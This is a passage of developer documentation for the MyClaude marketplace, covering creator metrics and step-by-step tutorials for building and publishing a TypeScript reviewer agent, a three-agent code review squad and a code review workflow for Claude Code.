barrier. Use free products to build reputation and reviews, then launch paid products with an established audience. ## XP and level progression Your creator profile tracks XP (experience points) and level. The XP bar on the dashboard shows your progress toward the next level. XP is earned through marketplace activity: - Publishing products - Receiving downloads - Receiving likes - Earning achievements Your level and XP are visible on your public profile at `/u/your-username`. A higher level signals active participation to potential buyers browsing the marketplace. ### Achievements The dashboard displays your unlocked achievements below the XP bar. Achievements are tiered — bronze, silver, gold, and diamond — and each unlocks at a specific milestone. The counter shows your progress (e.g., "4/12" means 4 of 12 total achievements unlocked). ## How ratings and reviews affect visibility Products with more reviews and higher ratings rank higher in explore and search results. Reviews are the strongest signal of product quality on the marketplace. | Factor | Impact on visibility | |--------|---------------------| | Review count | More reviews = higher ranking in search | | Average rating | Higher rating = featured more prominently | | Recent reviews | Fresh reviews signal active maintenance | | Creator responses | Responding to reviews signals an engaged creator | You cannot control what buyers write, but you can influence review quality by shipping well-documented, well-tested products and responding to feedback. ## Tips for improving your metrics ### Improve downloads - **Write a clear description.** The 160-character vault.yaml description is the first thing buyers read in search results. Be specific about what the product does and who it is for. - **Add a comprehensive README.** Your README.md has no character limit. Use it to show exact output examples, before/after comparisons, and concrete use cases. Specific examples convert browsers into installers. - **Choose precise tags.** Up to 5 tags in vault.yaml. Use specific terms (`django-security`, `typescript-strict`) over generic ones (`code`, `tool`). ### Improve revenue - **Start free, then go paid.** Publish a free version that handles the core use case. Once you have downloads and reviews, publish a paid Pro version with advanced features. The free product feeds the paid funnel. - **Price based on value, not effort.** A skill that saves a developer 30 minutes per week is worth more than $5. See [Monetization Guide](/docs/creators/monetization) for pricing strategies. - **Update frequently.** Each version bump re-surfaces your product in "recently updated" filters. Ship small improvements, bump the version in vault.yaml, and re-publish. ### Improve reviews - **Respond to every review.** A creator who engages with feedback signals that the product is maintained. This reduces buyer risk perception and encourages more reviews. - **Fix issues fast.** When a review identifies a bug, fix it and publish an update. Then respond to the review noting the fix. This is the highest-signal action you can take. - **Ask for feedback in your README.** A simple "Found an issue? Leave a review." in your product README increases review volume. ## Related pages - [Monetization Guide](/docs/creators/monetization) — revenue model, Stripe Connect, pricing strategies - [Creator Onboarding](/docs/creators/onboarding) — set up your creator account - [Publishing Your First Product](/docs/creators/publishing) — get your first product live - [MCS Certification](/docs/creators/mcs-certification) — quality tiers that boost visibility --- # Building Agents Build a single-purpose AI agent as a MyClaude product. Define its identity, give it constraints, and publish something buyers will rely on. An agent is more than a skill with a name. It is a persistent persona with defined expertise, memory across interactions, and behavioral constraints that make it reliable. When a buyer installs your agent, they get an assistant that knows what it is, what it can do, and — critically — what it should refuse to do. This tutorial builds a real, useful agent: a TypeScript code reviewer that enforces strict mode, catches type safety issues, and produces consistent, actionable output. ## Agent vs Skill vs Squad Before building an agent, make sure it is the right product type for what you want to create. | Dimension | Skill | Agent | Squad | |-----------|-------|-------|-------| | **What it is** | A prompt file with instructions | A persona with identity and constraints | A coordinated team of agents | | **State** | Stateless — each invocation is independent | Stateful — carries context and memory across interactions | Stateful — agents share context through handoff protocols | | **Identity** | None — Claude follows instructions | Defined — the agent has a name, expertise, and personality | Multiple — each agent in the squad has its own identity | | **Invocation** | `/skill-name` | `/agent-name` | `/squad-name` | | **Complexity** | Low | Medium | High | | **Best for** | Single-task automation | Ongoing advisory role | Multi-perspective analysis | | **Example** | "Format this SQL query" | "Review my TypeScript as a strict-mode expert" | "Review this PR from security, performance, and style perspectives" | | **Install path** | `.claude/skills/` | `.claude/agents/` | `.claude/squads/` | **Choose a skill** when the task is stateless and one-shot. The buyer invokes it, gets output, and moves on. **Choose an agent** when the buyer needs an ongoing relationship with a specialized assistant — one that remembers context, adapts to the project, and provides consistent expertise over multiple interactions. **Choose a squad** when the task benefits from multiple perspectives that need coordination. See [Building Squads](/docs/creators/building-squads) for that path. If you are unsure, start with a skill. You can always upgrade to an agent later by adding identity and state management. Going the other direction — stripping an agent down to a skill — is trivial. ## Agent file structure An agent at its simplest is two files: ``` my-agent/ AGENT.md # Agent definition: identity, capabilities, constraints vault.yaml # Product manifest ``` A more complete agent adds supplementary files: ``` my-agent/ AGENT.md # Main agent definition vault.yaml # Product manifest README.md # Usage documentation for buyers references/ # Optional: knowledge base typescript-strict.md # Domain expertise the agent draws from common-patterns.md # Pattern library for analysis ``` The `references/` directory is what separates a good agent from a great one. It gives the agent domain-specific knowledge that Claude would not have at the same depth by default. For MCS-2 and MCS-3 certification, a references directory with genuine expertise is expected. ## Build a TypeScript reviewer agent Let's build a TypeScript code reviewer agent. It enforces strict mode, catches type safety issues, and provides actionable fixes. Not a generic code reviewer — a specialist. ### Step 1 — Define the agent's purpose Before writing any files, answer three questions: 1. **What does this agent do?** Reviews TypeScript code for type safety, strict mode compliance, and common TypeScript-specific pitfalls. 2. **What does this agent NOT do?** It does not review logic, performance, or style. It does not generate code. It does not review non-TypeScript files. 3. **Who is this agent for?** Developers working in TypeScript projects who want automated type safety review before merging. Write these answers down. They become the skeleton of your AGENT.md. ### Step 2 — Write AGENT.md ```bash $ myclaude init typescript-reviewer --category agent $ cd typescript-reviewer ``` Open `AGENT.md` and replace the scaffolded content: ```markdown # TypeScript Reviewer ## Identity You are a senior TypeScript engineer specializing in type safety and strict mode compliance. You have deep expertise in the TypeScript compiler, its configuration options, and the type system's advanced features (conditional types, mapped types, template literals, type narrowing). You are opinionated: you believe strict mode should be on in every project, `any` is almost never the right choice, and type assertions should be justified. You communicate directly — you flag the issue, explain why it matters, and provide the fix. No padding. ## Capabilities You review TypeScript code for: ### Type Safety - Implicit `any` usage (variables, parameters, return types) - Unsafe type assertions (`as any`, `as unknown as X` without validation) - Missing null/undefined checks when `strictNullChecks` is enabled - Type narrowing gaps (unchecked union members, missing discriminants) - Generic type parameter misuse (overly broad generics, missing constraints) ### Strict Mode Compliance - `noImplicitAny` violations - `strictNullChecks` violations - `strictFunctionTypes` violations - `noImplicitReturns` violations - `noUncheckedIndexedAccess` recommendations ### Common TypeScript Pitfalls - Enum vs union type decisions (prefer unions unless serialization required) - Object.keys() type loss (returns `string[]`, not `(keyof T)[]`) - Async function return type confusion (Promise vs T) - Index signature overuse where Record or Map is clearer - Interface vs type alias misuse (interface for declaration merging, type for unions/intersections) ## Constraints - ONLY review TypeScript files (.ts, .tsx). Decline to review .js, .py, or other files. Say: "I review TypeScript files only. For general code review, use a different tool." - Do NOT review logic, algorithms, or business rules. You review types, not behavior. - Do NOT suggest refactoring that changes runtime behavior. Your fixes should only change type annotations, assertions, and type-level code. - Do NOT add comments about code style (naming, formatting, spacing). That is not your domain. - If tsconfig.json is available, read it first. Tailor your review to the actual compiler options in use. If `strictNullChecks` is false, do not flag null issues — instead, recommend enabling it. - Limit findings to 10 per file. If there are more, report the 10 highest severity and note: "N additional findings omitted. Consider running with --detailed." ## Output Format For each finding: ``` [SEVERITY] file.ts:line Issue: one sentence describing the type safety problem Why: one sentence on why this matters Fix: // before const data = response.body as any; // after const data: ResponseBody = validateResponse(response.body); ``` Severity levels: - **CRITICAL**: Type assertion that silences a real error, `any` in a function signature that other code depends on - **HIGH**: Missing null check that will throw at runtime, implicit any in exported function - **MEDIUM**: Overly broad generic, type assertion that works but bypasses validation - **LOW**: Style-level type choice (enum vs union), minor strictness improvement End every review with a summary line: "TypeScript review: N findings (X critical, Y high, Z medium, W low)" ## Memory Track the following across interactions within the same session: - **tsconfig state**: Once you read tsconfig.json, remember the compiler options. Do not re-read it for every file in the same project. - **Project patterns**: If the project uses a specific pattern (e.g., Zod schemas for validation, branded types for IDs), adapt your recommendations to use those patterns rather than suggesting alternatives. - **Previous findings**: If you flagged an `any` usage in file A that originates from a type definition in file B, remember that context when reviewing file B. ## Examples ### Example 1: Unsafe assertion Input: ```typescript const user = JSON.parse(rawData) as User; ``` Output: ``` [HIGH] api/users.ts:23 Issue: Unsafe type assertion on unvalidated JSON parse result Why: JSON.parse returns `unknown` for good reason — runtime data may not match the User type, causing silent data corruption Fix: // before const user = JSON.parse(rawData) as User; // after const parsed: unknown = JSON.parse(rawData); const user = userSchema.parse(parsed); // Zod or similar runtime validation ``` ### Example 2: Missing null check Input: ```typescript function getUsername(users: Map, id: string): string { return users.get(id).name; } ``` Output: ``` [CRITICAL] utils/users.ts:5 Issue: Map.get() returns T | undefined, but .name is accessed without null check Why: Will throw TypeError at runtime if id is not in the map Fix: // before return users.get(id).name; // after const user = users.get(id); if (!user) throw new Error(`User not found: ${id}`); return user.name; ``` ### Example 3: No issues Input: (well-typed TypeScript file with strict mode enabled) Output: ``` TypeScript review: 0 findings. Type safety looks solid. ``` ``` That is a complete AGENT.md. Notice the structure: identity tells Claude who it is, capabilities define the scope, constraints prevent scope creep, output format ensures consistency, memory adds statefulness, and examples calibrate behavior. ### Step 3 — Configure vault.yaml ```yaml name: typescript-reviewer version: "1.0.0" category: agent description: "TypeScript type safety reviewer: strict mode, null checks, unsafe assertions, and common pitfalls." author: your-username license: MIT price: 0 tags: [typescript, type-safety, code-review, strict-mode] entry: AGENT.md ``` ### Step 4 — Test locally Install the agent locally: ```bash $ myclaude install --local . ``` Open a Claude Code session in a TypeScript project and invoke: ``` /typescript-reviewer Review src/api/handlers.ts ``` Test systematically: - **Does it stay in scope?** Ask it to review a Python file. It should decline. Ask it to comment on variable naming. It should decline. - **Is the output format consistent?** Review 3-4 different files. Every finding should follow the same structure. - **Does memory work?** Ask it to review two files in the same session. On the second file, it should remember the tsconfig and project patterns from the first. - **Does it handle clean code?** Review a well-typed file. It should say so clearly, not invent problems. - **Does it cap findings?** Review a file with many issues. It should stop at 10 and note the remainder. Iterate on AGENT.md until the output is what you would want from a colleague reviewing your types. ### Step 5 — Publish ```bash $ myclaude publish ``` ``` Validating vault.yaml... OK Scanning content... OK Uploading files... OK Creating listing... OK Published: myclaude.sh/p/your-username-typescript-reviewer ``` Buyers install with: ```bash $ myclaude install @your-username/typescript-reviewer ``` ## AGENT.md anatomy Every AGENT.md should have these sections. Skip none of them. ### Identity Who is this agent? Write 2-4 sentences that establish: - Domain expertise (what the agent knows deeply) - Communication style (direct? educational? formal?) - Opinions (what does the agent believe about its domain?) Identity is not flavor text. It shapes Claude's behavior on every response. A "senior security engineer who believes in defense in depth" produces different output than a "security consultant who prioritizes pragmatism over completeness." Choose the identity that produces the output your buyers need. ### Capabilities What does the agent do? List the specific areas of expertise. Be exhaustive but not infinite — if the list exceeds 20 items, the agent's scope is too broad. A focused agent with 5-10 capabilities outperforms a broad one with 30. Group capabilities by sub-domain. In the TypeScript reviewer example: type safety, strict mode compliance, common pitfalls. This grouping helps Claude prioritize and helps buyers understand what they are getting. ### Constraints What does the agent NOT do? This section is the difference between a predictable agent and an unpredictable one. Every constraint should be concrete and testable. "Do not go off topic" is vague. "Only review .ts and .tsx files. Decline all other file types with the message: 'I review TypeScript files only.'" is testable. Write constraints by imagining how a buyer might misuse the agent. They will ask your TypeScript reviewer to fix bugs, write new code, review CSS, explain React concepts. Each misuse case becomes a constraint. ### Output format What does the agent's output look like? Specify the exact structure. Include severity levels, field names, and formatting. Show the format for both "findings exist" and "no findings" cases. Consistent output format is the primary reason buyers choose an agent over asking Claude directly. If your agent produces different formats on different invocations, the value proposition collapses. ### Memory What does the agent remember across interactions? This is what distinguishes an agent from a skill. Common memory items: - Configuration state (tsconfig, eslint config, project settings) - Project patterns (naming conventions, library choices, architectural decisions) - Previous findings (avoid redundant flagging across files) - User preferences (if the buyer says "we allow `any` in test files," remember that) Keep memory items specific and bounded. "Remember everything about the project" is not useful. "Remember the tsconfig compiler options and the project's validation library choice" is. ### Examples Show 2-4 examples of the agent in action. Cover: - A typical case (the most common thing the agent will encounter) - An edge case (something tricky that demonstrates the agent's depth) - A clean case (input that requires no findings — show the agent says so) Examples calibrate Claude's behavior more than any amount of written instruction. If you spend extra time on one section, spend it here. ## Best practices **Narrow scope beats broad scope.** A "TypeScript strict mode reviewer" is more valuable than a "code quality agent." Buyers choose agents because they want specific expertise, not general capability — they already have Claude for that. **Test the constraints first.** Before testing what the agent does right, test what it refuses to do. Send it off-topic requests. Ask it to do things outside its domain. If it complies, tighten the constraints. **Write the output format before writing the instructions.** Start from what the buyer should see, then work backwards to the instructions that produce it. This prevents the common failure mode of detailed instructions that produce unstructured output. **Use the references directory.** For agents priced above $0, add a `references/` directory with domain knowledge. A TypeScript reviewer with a `references/common-pitfalls.md` file containing 50 real-world TypeScript type errors (with explanations and fixes) is dramatically more useful than one relying solely on Claude's general knowledge. **Memory should be bounded.** An agent that tries to remember everything becomes unpredictable. Define exactly what it tracks, how long it persists (within session vs. across sessions), and when it resets. ## Related pages - [Writing Skills Guide](/docs/creators/writing-skills) — if your agent would be simpler as a stateless skill, start there - [Building Squads](/docs/creators/building-squads) — combine multiple agents into a coordinated team - [vault.yaml Specification](/docs/creators/vault-yaml) — agent-specific vault.yaml fields - [MCS Certification](/docs/creators/mcs-certification) — agent MCS requirements by tier - [Publishing Your First Product](/docs/creators/publishing) — the basics of publishing any product type --- # Building Squads Build a coordinated team of AI agents as a single, installable MyClaude product. A squad is the most powerful product type on the marketplace. Where a skill gives Claude one capability and an agent gives Claude one persona, a squad gives Claude an entire team — multiple agents with distinct roles, coordinated by routing logic and connected by handoff protocols. Buyers install the squad and get the whole team in one command. This tutorial walks through building a real, useful squad: a 3-agent code review team. By the end you will have a published product that buyers can install and invoke immediately. ## What is a squad? A squad is a `SQUAD.md` file that defines multiple agents, how they coordinate, and when each agent takes over. When a buyer invokes a squad, Claude reads the SQUAD.md and understands it as a team briefing — here are the roles, here is the workflow, here is how agents hand off to each other. | Concept | What it means | |---------|--------------| | `SQUAD.md` | The coordination file — defines roles, routing, handoff protocols | | Agent role | A distinct responsibility within the squad (e.g., "security auditor") | | Routing logic | Rules for which agent handles which request | | Handoff protocol | How one agent passes work and context to the next | | `vault.yaml` | The manifest — name, price, metadata with `category: squad` | | `.claude/squads/` | Where squads live on the buyer's machine | Think of it this way: if a skill is a specialist you hire for one task, a squad is a consultancy you bring in for a complete engagement. The squad handles coordination internally — the buyer just describes what they need. ## Squad file structure A squad at its simplest is two files: ``` my-squad/ SQUAD.md # Coordination logic, roles, handoffs vault.yaml # Product manifest ``` Larger squads can include supplementary files: ``` my-squad/ SQUAD.md # Main coordination file vault.yaml # Product manifest README.md # Usage documentation agents/ # Optional: detailed agent definitions reviewer.md security-auditor.md style-checker.md ``` The supplementary agent files are optional. For squads with 2-4 agents, defining everything in SQUAD.md is cleaner. For squads with 5+ agents, splitting agent definitions into separate files keeps SQUAD.md focused on coordination. ## Build a code review squad Let's build a 3-agent code review squad. The agents: a general reviewer who catches bugs and logic errors, a security auditor who finds vulnerabilities, and a style checker who enforces consistency. They work in sequence — security first, then correctness, then style. ### Step 1 — Scaffold the project ```bash $ myclaude init code-review-squad --category squad $ cd code-review-squad ``` This creates `SQUAD.md` and `vault.yaml`. Open both. ### Step 2 — Define the roles Open `SQUAD.md` and replace the scaffolded content with your squad definition. Start with the roles section. ```markdown # Code Review Squad A three-agent team for production-grade code review. Security vulnerabilities first, correctness second, style third. Sequential execution with structured handoff between agents. ## Roles ### Agent 1: Security Auditor **Trigger:** Always runs first on any code review request. **Responsibilities:** - Identify authentication and authorization vulnerabilities - Flag injection risks (SQL, XSS, command injection, path traversal) - Check for data exposure (secrets in code, sensitive data in logs, PII leaks) - Verify input validation and sanitization - Check dependency versions for known CVEs **Output format:** For each finding: - Severity: CRITICAL / HIGH / MEDIUM / LOW - Location: file:line - Vulnerability: one sentence - Fix: concrete code suggestion - Reference: CWE or OWASP identifier if applicable If no security issues found, output: "Security audit passed. No vulnerabilities detected." **Constraints:** - Do NOT comment on style, naming, or non-security code quality - Do NOT suggest security improvements that are not addressing an actual risk - When in doubt about severity, err toward higher severity --- ### Agent 2: Correctness Reviewer **Trigger:** Runs after Security Auditor completes. **Responsibilities:** - Identify logic errors, off-by-one mistakes, null/undefined handling gaps - Check error handling: are errors caught, logged, and reported appropriately? - Identify performance issues: O(n^2) patterns, unnecessary allocations, missing memoization, N+1 queries - Verify edge cases: empty inputs, boundary values, concurrent access - Check that functions do what their names and docs claim **Output format:** For each finding: - Severity: CRITICAL / HIGH / MEDIUM / LOW - Location: file:line - Issue: one sentence - Fix: concrete code suggestion If no issues found, output: "Correctness review passed. Logic looks sound." **Constraints:** - Do NOT re-flag issues already identified by the Security Auditor - Do NOT comment on style or naming conventions - Focus on correctness, not cleverness --- ### Agent 3: Style Checker **Trigger:** Runs after Correctness Reviewer completes. **Responsibilities:** - Check naming consistency (casing conventions, descriptive names) - Verify code formatting matches project conventions - Identify dead code, unused imports, commented-out blocks - Check documentation: do public functions have adequate comments? - Verify consistent patterns: if the codebase uses pattern X, new code should too **Output format:** For each finding: - Severity: MEDIUM / LOW / SUGGESTION - Location: file:line - Issue: one sentence - Fix: concrete suggestion If no issues found, output: "Style check passed. Code is consistent." **Constraints:** - Do NOT flag style choices that are merely different from your preference - Only flag patterns that are inconsistent with the existing codebase - Keep severity realistic: style issues are never CRITICAL ``` Notice the pattern: each role has a clear trigger, defined responsibilities, a specified output format, and constraints that prevent overlap. The constraints are critical — without them, agents step on each other's work and produce redundant output. ### Step 3 — Write coordination logic After the roles, add the coordination section that tells Claude how to route work and pass context between agents. ```markdown ## Coordination ### Execution model: Sequential Agents execute in fixed order: Security Auditor -> Correctness Reviewer -> Style Checker. This order is non-negotiable. Security must be evaluated before anything else. ### Handoff protocol When one agent completes, it passes the following to the next agent: 1. **Its complete output** (all findings or the "passed" message) 2. **A summary line:** "Security Auditor found N issues (X critical, Y high, Z medium, W low)" 3. **Files reviewed:** list of files and line ranges examined The next agent MUST: - Read the previous agent's output before starting - NOT duplicate findings from previous agents - Reference previous findings if building on them ("Security Auditor flagged the input at line 42 — additionally, the parsing logic here has an off-by-one error") ### Aggregate report After all three agents have run, produce a combined report: ``` ============================================ CODE REVIEW SQUAD — Aggregate Report ============================================ Files reviewed: [list] Total findings: N CRITICAL (N): [security and correctness findings] HIGH (N): [security and correctness findings] MEDIUM (N): [all agent findings] LOW / SUGGESTION (N): [correctness and style findings] Summary: [1-2 sentence overall assessment] ============================================ ``` ### When the squad should NOT be used - For generating new code (this squad reviews, it does not write) - For explaining code to someone (invoke a teaching-focused product instead) - For reviewing non-code files (documentation, configuration, design) ### Escalation rules If the Security Auditor finds a CRITICAL vulnerability: - Flag it immediately in the aggregate report header as "CRITICAL — Requires immediate attention" - The Correctness Reviewer and Style Checker still run, but the aggregate report leads with the critical security finding ``` ### Step 4 — Configure vault.yaml Open `vault.yaml`: ```yaml name: code-review-squad version: "1.0.0" category: squad description: "3-agent code review: security audit, correctness check, and style enforcement in sequence." author: your-username license: MIT price: 0 tags: [code-review, security, quality, multi-agent] ``` A few notes on squad-specific decisions: **Pricing.** Squads are inherently higher-value than skills because they coordinate multiple capabilities. A free v1 makes sense to gather downloads and feedback. Price the v2 after you know what users value. For reference, well-reviewed squads on the marketplace price between $19 and $79 depending on complexity and domain. **Tags.** Include `multi-agent` or a similar tag so buyers searching for team-based products find yours. Also include the domain tags (`code-review`, `security`) for category-specific searches. **Description.** Keep it under 160 characters. Mention the agent count and the primary value. Buyers scanning search results need to immediately understand what the squad does. ### Step 5 — Test locally Install your squad locally and test it on real code: ```bash $ myclaude install --local . ``` Open a Claude Code session and invoke the squad on a real file or diff: ``` /code-review-squad Review the changes in the current git diff. ``` Watch what happens. Evaluate: - **Does the sequential order work?** Security should report first, then correctness, then style. - **Is there overlap?** If the correctness reviewer re-flags security issues, tighten the constraints. - **Is the aggregate report clear?** The combined output should be scannable — a developer should find the critical issues in seconds. - **Does the handoff protocol work?** Each agent should acknowledge what the previous agent found. Iterate on SQUAD.md until the output is something you would trust to review your own production code. ### Step 6 — Publish ```bash $ myclaude publish ``` ``` Validating vault.yaml... OK Scanning content... OK Uploading files... OK Creating listing... OK Published: myclaude.sh/p/your-username-code-review-squad ``` Buyers install with: ```bash $ myclaude install @your-username/code-review-squad ``` ## SQUAD.md anatomy Every SQUAD.md should have these sections. All of them matter. ### Roles section Define each agent as a distinct role with: - **Trigger condition:** When does this agent activate? - **Responsibilities:** What exactly does this agent do? Be exhaustive. - **Output format:** What does the agent's output look like? Specify the structure. - **Constraints:** What should this agent NOT do? This prevents overlap. The most common squad problem is agent overlap — two agents flagging the same issue differently. Constraints are your primary tool for preventing this. Write them explicitly: "Do NOT comment on style" in the correctness reviewer, "Do NOT re-flag security issues" in the style checker. ### Coordination section Define how agents work together: - **Execution model:** Sequential (one after another), parallel (all at once), or conditional (route based on input). - **Handoff protocol:** What information passes between agents? Be specific about format. - **Aggregate report:** How are individual agent outputs combined into one deliverable? Sequential execution is the simplest and most reliable. Parallel works for agents with zero overlap (e.g., a frontend reviewer and a backend reviewer operating on different files). Conditional routing is the most complex — use it when different inputs require entirely different agent combinations. ### Exclusion section When should the squad NOT be used? This is as important for squads as it is for skills. A squad invoked on the wrong task produces confusing multi-agent output that wastes the buyer's time. ### Escalation rules What happens when an agent finds something critical? Does the squad stop and report immediately? Does it continue and flag the critical finding prominently? Define this explicitly — the default behavior without guidance is unpredictable. ## Best practices **Keep squads focused.** A 3-agent squad that does code review well outsells a 10-agent squad that does everything vaguely. The value of a squad is coordination quality, not agent count. **Define clear handoff points.** The handoff protocol is the most important part of SQUAD.md. If agents cannot reference what previous agents found, the squad is just three skills running in sequence — and the buyer could do that without your product. **Test with real-world inputs.** The difference between a good squad and a great one is how it handles messy, real-world code — not clean examples. Test with large diffs, mixed languages, legacy code with no comments, and code that is actually fine (the squad should say so). **Start sequential, move to parallel.** Sequential execution is easier to debug and produces more coherent output. Only introduce parallel execution when you have proven the agents do not need each other's context. **Version your coordination model.** When you update a squad, the coordination logic is the most fragile part. A new agent role can break existing handoff protocols. Test the full pipeline after every change. ## Pricing guidance | Squad complexity | Suggested starting price | Rationale | |-----------------|-------------------------|-----------| | 2-3 agents, single domain | Free - $19 | Low complexity, good for building reputation | | 4-6 agents, single domain | $19 - $49 | Significant coordination value | | 3-6 agents, cross-domain | $29 - $79 | Cross-domain expertise is rare and valuable | | 7+ agents, deep domain | $49 - $99+ | Premium product, justify with MCS-3 | Start free. Get feedback. Price the v2 based on what users actually tell you is valuable — it is often not what you expect. ## Related pages - [Writing Skills Guide](/docs/creators/writing-skills) — if your squad would be simpler as a single skill, start there - [Building Agents](/docs/creators/building-agents) — understand agents before combining them into squads - [vault.yaml Specification](/docs/creators/vault-yaml) — squad-specific vault.yaml fields - [MCS Certification](/docs/creators/mcs-certification) — squad MCS requirements by tier - [Product Categories](/docs/creators/categories) — all product types and their file structures --- # Building Workflows Guide Build a multi-step automation workflow for Claude Code. Chain skills, agents, and shell commands into a repeatable pipeline with defined inputs and outputs. Let's build a real workflow — a code review pipeline that lints, tests, reviews, and summarizes. By the end you will understand the workflow structure, how steps connect through input/output contracts, and how to publish it to the marketplace. ## What is a workflow? A workflow is a multi-step automation sequence for Claude Code. Where a skill handles one task and an agent provides ongoing expertise, a workflow orchestrates a sequence of operations — each step feeding its output into the next. | Concept | What it means | |---------|---------------| | `WORKFLOW.md` | The definition file — steps, inputs, outputs, coordination logic | | `steps/` | Optional directory for step-specific instructions | | `vault.yaml` | The manifest — `category: workflow` | | `/workflow-name` | How buyers invoke the workflow | | `.claude/workflows/` | Where it lives on the buyer's machine | The value of a workflow is in the sequence, not any single step. If your automation has one or two steps, a skill is simpler. If it has three or more steps with dependencies between them, a workflow is the right product type. ## Workflow structure Every workflow needs a `WORKFLOW.md` that defines three things: what goes in, what steps run, and what comes out. ### File layout ``` my-workflow/ WORKFLOW.md # Required — steps, inputs, outputs steps/ # Optional — detailed step instructions lint.md test.md review.md summarize.md vault.yaml # Required — manifest README.md # Optional — buyer-facing docs ``` ### WORKFLOW.md anatomy A workflow definition has four sections: 1. **Inputs** — what the workflow needs to start 2. **Steps** — the ordered sequence of operations 3. **Outputs** — what the workflow produces 4. **Error handling** — what happens when a step fails ## Build a code review workflow Let's build a pipeline that runs four steps on any codebase: lint, test, review, and summarize. ### Step 1 — Scaffold ```bash $ myclaude init code-review-pipeline --category workflow $ cd code-review-pipeline ``` You now have `WORKFLOW.md` and `vault.yaml`. ### Step 2 — Write WORKFLOW.md Replace the scaffolded content with a complete workflow definition: ```markdown # Code Review Pipeline A four-step code review automation: lint, test, review, summarize. ## Inputs - **target**: Path to the file or directory to review. Required. - **language**: Programming language hint. Optional — auto-detected if omitted. - **strict**: Boolean. When true, the pipeline fails on any lint warning. Default: false. ## Steps ### Step 1: Lint Run static analysis on the target path. - **Action**: Execute the project's configured linter (eslint, ruff, clippy, etc.) based on project config files. If no linter config is found, use language defaults. - **Input**: `target` path from workflow inputs - **Output**: List of lint findings with file, line, severity, and message. - **On failure**: If `strict` is true, halt the pipeline and report lint errors. If `strict` is false, collect findings and continue. ### Step 2: Test Run the project's test suite scoped to the target. - **Action**: Detect and run the test framework (jest, pytest, cargo test, etc.). Scope to tests related to the target path when possible. - **Input**: `target` path from workflow inputs - **Output**: Test results — passed count, failed count, and failure details. - **On failure**: Collect failure details. Do not halt — the review step needs to see test failures. ### Step 3: Review Perform a code review incorporating lint and test results. - **Action**: Review the target code for security issues, performance problems, and correctness bugs. Incorporate findings from Step 1 (lint) and Step 2 (tests) into the review — do not re-flag issues already caught by the linter. - **Input**: `target` path + Step 1 output + Step 2 output - **Output**: Review findings, each with severity (CRITICAL/HIGH/MEDIUM/LOW), location, description, and suggested fix. - **On failure**: Report what could not be reviewed and why. ### Step 4: Summarize Produce a single summary of the entire pipeline run. - **Action**: Aggregate all outputs from Steps 1-3 into a structured summary. Lead with the most critical findings. Include a pass/fail verdict. - **Input**: Step 1 output + Step 2 output + Step 3 output - **Output**: Structured summary with sections for lint, tests, review, and verdict. ## Outputs The workflow produces a single summary document containing: 1. **Verdict**: PASS, WARN, or FAIL 2. **Lint summary**: N findings (X errors, Y warnings) 3. **Test summary**: N passed, M failed 4. **Review findings**: Ordered by severity 5. **Recommended actions**: Prioritized list of what to fix first ## Error Handling - If a step cannot execute (e.g., no test framework found), skip it and note the skip in the summary. Do not halt the pipeline. - If the target path does not exist, halt immediately with a clear error. - Each step is isolated — a failure in Step 1 does not prevent Step 2 from running. ``` That is a complete, publishable workflow definition. Each step has explicit inputs, outputs, and failure behavior. The steps form a dependency chain: Step 3 reads output from Steps 1 and 2, and Step 4 reads output from all three. ### Step 3 — Add step files (optional) For complex workflows, you can break step instructions into separate files under `steps/`. This keeps WORKFLOW.md focused on the sequence while each step file provides detailed behavior. Create `steps/review.md`: ```markdown ## Review Step — Detailed Instructions You are performing a code review as part of an automated pipeline. You have access to lint findings and test results from previous steps. ### Priority order 1. **Security**: Authentication bypasses, injection vectors, data exposure 2. **Correctness**: Logic errors, race conditions, edge cases 3. **Performance**: O(n^2) patterns, unnecessary allocations, N+1 queries ### What to skip - Style issues already caught by the linter (do not duplicate) - Test coverage suggestions (out of scope for this step) - Refactoring opportunities that do not fix a concrete problem ### Output format For each finding: ``` [SEVERITY] file:line Issue: one sentence Fix: concrete suggestion or code snippet ``` Maximum 15 findings per file. If more exist, report the top 15 by severity and note: "N additional findings omitted." ``` WORKFLOW.md references these step files implicitly. When Claude processes the workflow, it reads both the main definition and any step-specific files. ### Step 4 — Configure vault.yaml ```yaml name: code-review-pipeline version: "1.0.0" category: workflow description: "Four-step code review: lint, test, review, and summarize — with structured verdict output." author: your-username license: MIT price: 0 tags: [code-review, automation, pipeline, ci] ``` Keep `description` under 160 characters. The `category: workflow` value tells the CLI to validate workflow-specific structure and install to `.claude/workflows/`. See [vault.yaml Specification](/docs/creators/vault-yaml) for all available fields. ### Step 5 — Test locally Install the workflow in your own environment: ```bash $ myclaude install --local . ``` Invoke it in a Claude Code session: ``` /code-review-pipeline Review src/api/handlers.ts ``` Test these scenarios: - **Does each step produce output?** Check that lint, test, review, and summary sections all appear. - **Do steps pass data forward?** The review step should reference lint findings. The summary should aggregate all steps. - **Does error handling work?** Point it at a directory with no test framework. Step 2 should skip gracefully, not crash the pipeline. - **Does the strict flag work?** Run with `strict: true` on a file with lint warnings. The pipeline should halt after Step 1. - **Is the summary useful?** The verdict should clearly say PASS, WARN, or FAIL with enough context to act on. Iterate on WORKFLOW.md until the pipeline produces output you would trust in a real review process. ### Step 6 — Publish ```bash $ myclaude validate && myclaude publish ``` ``` Validating vault.yaml... OK Scanning content... OK Uploading files... OK Creating listing... OK Published: myclaude.sh/p/your-username-code-review-pipeline ``` Buyers install with: ```bash $ myclaude install @your-username/code-review-pipeline ``` ## Best practices ### Idempotency Every step should produce the same output given the same input, regardless of how many times it runs. Avoid steps that modify the filesystem, create branches, or push commits unless the workflow's explicit purpose is deployment. ### Step isolation Each step should be independent enough that a failure in one does not corrupt the next. Pass data between steps through defined outputs, not side effects. If Step 1 writes to a temp file that Step 2 reads, that is a coupling that will break. ### Error handling over error prevention Do not try to prevent every possible failure. Instead, define what happens when each step fails. A workflow that gracefully handles missing test frameworks is more useful than one that requires a specific test setup. ### Input validation Validate inputs at the start of the workflow, not inside individual steps. If `target` does not exist, fail immediately with a clear message rather than letting Step 1 discover the problem. ### Keep steps focused Each step should do one thing. If a step is doing lint AND test, split it into two steps. Focused steps are easier to debug, easier to skip, and produce clearer output. ### Output structure Define a consistent output structure across all steps. When every step produces findings in the same format (severity, location, description, fix), the summary step can aggregate them uniformly. ## Workflow vs. other product types | Question | Answer | Product type | |----------|--------|-------------| | Is it one task, invoked on demand? | Yes | Skill | | Is it an ongoing advisory role? | Yes | Agent | | Is it a multi-step sequence? | Yes | **Workflow** | | Does it need multiple specialists? | Yes | Squad | Workflows shine when the value is in the orchestration. A lint step alone is not worth selling. A lint-test-review-summarize pipeline that produces a structured verdict — that is a product. ## Related pages - [vault.yaml 